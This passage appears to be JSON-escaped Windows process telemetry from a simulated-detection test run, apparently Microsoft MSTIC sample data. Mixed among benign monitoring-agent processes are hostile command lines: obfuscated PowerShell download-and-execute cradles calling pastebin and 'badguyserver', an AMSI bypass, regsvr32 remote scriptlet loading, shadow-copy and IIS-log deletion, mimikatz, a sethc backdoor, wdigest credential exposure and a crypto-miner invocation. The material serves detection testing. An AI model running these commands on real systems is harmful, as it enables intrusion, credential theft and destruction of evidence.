\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\".\\\\reg not /domain:everything that /sid:shines is /krbtgt:golden !\",\"cmd /c \\\"systeminfo && systeminfo\\\"\",\".\\\\rundll32 /C 42424.exe\",\"42424.exe\",\".\\\\rundll32 /C c:\\\\users\\\\MSTICAdmin\\\\42424.exe\",\".\\\\rundll32 /C 1234.exe\",\"1234.exe\",\".\\\\rundll32 /C c:\\\\users\\\\MSTICAdmin\\\\1234.exe\",\".\\\\rundll32 /C reg.exe\",\"reg.exe\",\".\\\\reg.exe add \\\\hkcu\\\\software\\\\microsoft\\\\some\\\\key\\\\Run /v abadvalue\",\"c:\\\\Diagnostics\\\\UserTmp\\\\tsetup.1.exe C:\\\\Users\\\\MSTICAdmin\\\\AppData\\\\Local\\\\Temp\\\\2\\\\is-01DD7.tmp\\\\tsetup.1.0.14.tmp\\\" /SL5=\\\"$250276,19992586,423424,C:\\\\Users\\\\MSTICAdmin\\\\Downloads\\\\tsetup.1.0.14.exe\",\".\\\\rundll32.exe /C mshtml,RunHTMLApplication javascript:alert(tada!)\",\".\\\\netsh.exe \\\"in (*.exe) do start # artificial commandline solely for purposes of triggering test\\\"\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell Set-ExecutionPolicy RemoteSigned&echo [S]&cd&echo [E]\\\"\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell Enable-WSManCredSSP =2013Role Server -force&echo [S]&cd&echo [E]\\\"\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell winrm set winrm/config/service/Auth @{Kerberos=003D\\\"true\\\"}&echo [S]&cd&echo [E]\\\"\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\ProgramData\\\"© \\\\\\\\[REDACTED]\\\\c$\\\\users\\\\[REDACTED]\\\\Documents\\\\\\\"Password Change Dates.docx\\\"\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&c:\\\\windows\\\\system32\\\\inetsrv\\\\appcmd set config \\\"Default Web Site/\\\" /section:httplogging /dontLog:true&echo [S]&cd&echo [E]\\\"\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&del C:\\\\inetpub\\\\logs\\\\logFiles\\\\W3SVC1\\\\*.log /q&echo [S]&cd&echo [E]\\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\perfc.dat \",\"c:\\\\Diagnostics\\\\UserTmp\\\\sdopfjiowtbkjfnbeioruj.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\doubleextension.pdf.exe \",\"vssadmin delete shadows /all /quiet\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\system32\\\\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}\",\"cmd.exe /c c:\\\\Diagnostics\\\\WindowsSimulateDetections.bat c:\\\\Diagnostics\\\\UserTmp\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; marcook@microsoft.com; dotanp@microsoft.com; liengli@microsoft.com\",\"net user adm1nistrator Bob_testing /add\",\"C:\\\\Windows\\\\system32\\\\net1 user adm1nistrator Bob_testing /add\",\"net share TestShare=c:\\\\testshare /Grant:Users,Read\",\"C:\\\\Windows\\\\system32\\\\net1 share TestShare=c:\\\\testshare /Grant:Users,Read\",\"dism /online /enable-feature /featurename:File-Services /NoRestart\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"net use q: \\\\\\\\MSTICAlertsWin1\\\\TestShare Bob_testing /User:adm1nistrator\",\"C:\\\\Windows\\\\TEMP\\\\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\\\\dismhost.exe {D57BA872-53C0-424D-80AE-E49112D1CF04}\",\"C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\"C:\\\\Windows\\\\winsxs\\\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.2602_none_7ee6020e2207416d\\\\TiWorker.exe -Embedding\",\"net use q: /delete\",\"net share TestShare /delete\",\"C:\\\\Windows\\\\system32\\\\net1 share TestShare /delete\",\"net user adm1nistrator /delete\",\"C:\\\\Windows\\\\system32\\\\net1 user adm1nistrator /delete\",\".\\\\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll\",\"C:\\\\Windows\\\\system32\\\\svchost.exe -k wsappx\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\suchost.exe -a cryptonight -o bcn -u bond007.01 -p x -t 4\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd /c \\\"echo TVqQAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> delme.b64\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd /c \\\"echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> delme.b64\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell -command {(n`EW-obJ`E`cT N`et`.W`eb`C`li`en`t).DownloadFile('https://blah/png','google.png')}\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell.exe -c \\\"$a = 'Download'+'String'+\\\"(('ht'+'tp://paste'+ 'bin/'+'raw/'+'pqCwEm17'))\\\";$b = '(New-Object' + ' Net.WebClient)';'$b.$a' | Out-File .\\\\evil.ps1;\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell -c {IEX (New-Object Net.WebClient).DownloadString(('ht'+(\\\"{2}{0}{1}\\\"-f ':/','/paste','tp')+'bin/'+'raw/'+(\\\"{1}{0}\\\"-f'Em17','pqCw')));}\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd /c \\\".\\\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^tar^t-bITSTRanS^fER -^SOURCE^ 'http://somedomain/best-kitten-names-1.jpg' ^-d^EStIN^At^IOn ^'C:\\\\Users\\\\$env:UserName\\\\AppData\\\\Local\\\\Temp\\\\kittens1.jpg';\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd /c \\\".\\\\n^e^t u^se^r\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell -enc JAB0ACAAPQAgACcAZABpAHIAJwA7AA0ACgAmACAAKAAnAEkAbgB2AG8AawBlACcAKwAnAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAnACkAIAAkAHQA\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd /c \\\"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd /c \\\"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"certutil -decode delme.b64 implant.exe\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"implant.exe k111\",\"implant.exe 81ed03caf6901e444c72ac67d192fb9c\",\"implant.exe -b -t -m\",\"cmd /c \\\"echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell -Noninteractive -Noprofile -Command \\\"Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell Invoke-Shellcode.ps1\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell Invoke-ReverseDnsLookup.ps1\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell -command \\\"(New-Object Net.WebClient).DownloadString(('ht'+'tp://pasteb' + 'bin/'+'raw/'+'pqCwEm17'));\\\"\",\"net localgroup Administrators\",\"C:\\\\Windows\\\\system32\\\\net1 localgroup Administrators\",\"whoami\",\"hostname\",\"netstat -an\",\"net user Bob1 /domain\",\"C:\\\\Windows\\\\system32\\\\net1 user Bob1 /domain\",\"net user BobX /domain\",\"C:\\\\Windows\\\\system32\\\\net1 user BobX /domain\",\"net group \\\"Domain Admins\\\" /domain\",\"C:\\\\Windows\\\\system32\\\\net1 group \\\"Domain Admins\\\" /domain\",\".\\\\rUnDlL32 /C ShEll32Control_RanDLL.dll\",\".\\\\reg query add mscfile\\\\\\\\\\\\\\\\open\",\".\\\\reg add Image File Execution Options sethc.exe\",\".\\\\ftp -s:C:\\\\RECYCLER\\\\xxppyy.exe\",\".\\\\dubrute.exe\",\".\\\\nlbrute.exe\",\".\\\\reg add \\\"HKLM\\\\system\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\" /v \\\"fDenyTSConnections\\\" /t REG_DWORD /d 0x1 /f\",\".\\\\reg add \\\"HKLM\\\\system\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\" /v \\\"fDenyTSConnections\\\" /t REG_DWORD /d 0x0 /f\",\"net use v: \\\\\\\\tsclient\\\\c\",\"net v: /delete\",\"C:\\\\Windows\\\\system32\\\\net1 v: /delete\",\"cmd /c C:\\\\Windows\\\\System32\\\\mshta.exe vbscript:CreateObject(\\\"Wscript.Shell\\\").Run(\\\".\\\\powershell.exe -c \\\"\\\"$x=$((gp HKLM:Software\\\\Microsoft\\\\Windows\\\\CurrentVersion Certificate).Certificate);.\\\\powershell -E $y\\\"\\\"\\\",0,True)(window.close)\",\".\\\\netsh advfirewall firewall add rule name=RbtGskQ action=allow program=c:\\\\users\\\\Bob\\\\appdata\\\\Roaming\\\\RbtGskQ\\\\RbtGskQ.exe\",\".\\\\reg add HKLM\\\\KEY_LOCAL_MACHINE\\\\...securityproviders\\\\wdigest uselogoncredential /t 1\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"c:\\\\Windows\\\\System32\\\\cmd.exe /c net user\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd /c c:\\\\Diagnostics\\\\UserTmp\\\\scrsave.scr\\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\svchost.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\smss.exe \",\"c:\\\\Windows\\\\System32\\\\svchost.exe -k malicious\",\"cmd.exe /c echo createobject\\\"msxml2.xmlhttp\\\") \",\"ASC_Alerttest_662jfi039n.exe -foo\",\".\\\\powershell.exe -command [ref].assembly.gettype('http://system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').setvalue($null,$true)\\\\\\\"\",\"netsh start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\\\\\\\Users\\\\\\\\user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\bzzzzzz.txt\",\".\\\\wuauclt.exe /C \\\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\\\"\",\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\system32\\\\net1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\".\\\\lsass.exe /C \\\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\\\"\",\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\system32\\\\net1\",\"cmd /c \\\"powershell wscript.shell used to download a .gif\\\"\",\"cacls.exe c:\\\\windows\\\\system32\\\\wscript.exe /e /t /g everyone:f\",\"cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&c:\\\\windows\\\\system32\\\\inetsrv\\\\appcmd set config \\\"Default Web Site/\\\" /section:httplogging /dontLog:true&echo [S]&cd&echo [E]\\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\2840.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\a_keygen.exe \",\"cmd /c echo \\\" SYSTEMINFO && SYSTEMINFO && DEL \\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\bittorrent.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe firewall set opmode mode=disable profile=all\",\"cmd /c echo rundll32.exe perfc.dat\",\"c:\\\\Diagnostics\\\\UserTmp\\\\ransomware.exe @ abc.com abc.wallet\",\"cmd /c echo /e:vbscript.encode /b\",\"pcalua.exe -a \\\\\\\\server\\\\payload.dll\",\"findstr /si password sysvol *.txt\",\"odbcconf.exe /S /A {REGSVR C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\{RANDOM}.txt\",\"odbcconf.exe /f my.rsp\\u00e1\\u00e1\",\"sqldumper.exe 464 0 0x0110:40\",\"mt.exe port\",\"mt.exe smb\",\"hd.exe -pslist\",\"hd.exe -enum\",\"netsh.exe PortOpenning\",\"certutil -urlcache -split -f http://127.0.0.1/ \",\".\\\\reg add \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Svchost\\\\MyNastySvcHostConfig\\\"\",\".\\\\reg delete \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Svchost\\\\MyNastySvcHostConfig\\\"\",\"sc create MSTICTestService binPath=C:\\\\Users\\\\MSTICA~1\\\\AppData\\\\Local\\\\Temp\\\\hd.exe DisplayName=\\\"Test Service\\\"\",\"sc delete MSTICTestService\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"cmd /c \\\"echo blahtest > \\\\\\\\.\\\\pipe\\\\blahtest\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\reg.exe add \\\"hkcu\\\\console\\\" /v windowposition /t reg_dword /d 33554556 /f\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"c:\\\\windows\\\\fonts\\\\csrss.exe\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"C:\\\\Windows\\\\System32\\\\svchost.exe -k WerSvcGroup\",\"C:\\\\Windows\\\\system32\\\\WerFault.exe -u -p 6060 -s 472\",\"c:\\\\windows\\\\fonts\\\\conhost.exe\",\".\\\\mimikatz.exe\",\".\\\\rundll32.exe /C c:\\\\windows\\\\fonts\\\\conhost.exe\",\"c:\\\\windows\\\\fonts\\\\conhost.exe\",\".\\\\regsvr32 /u /s c:\\\\windows\\\\fonts\\\\csrss.exe\",\"tasklist\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\system32\\\\MusNotification.exe Display\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft 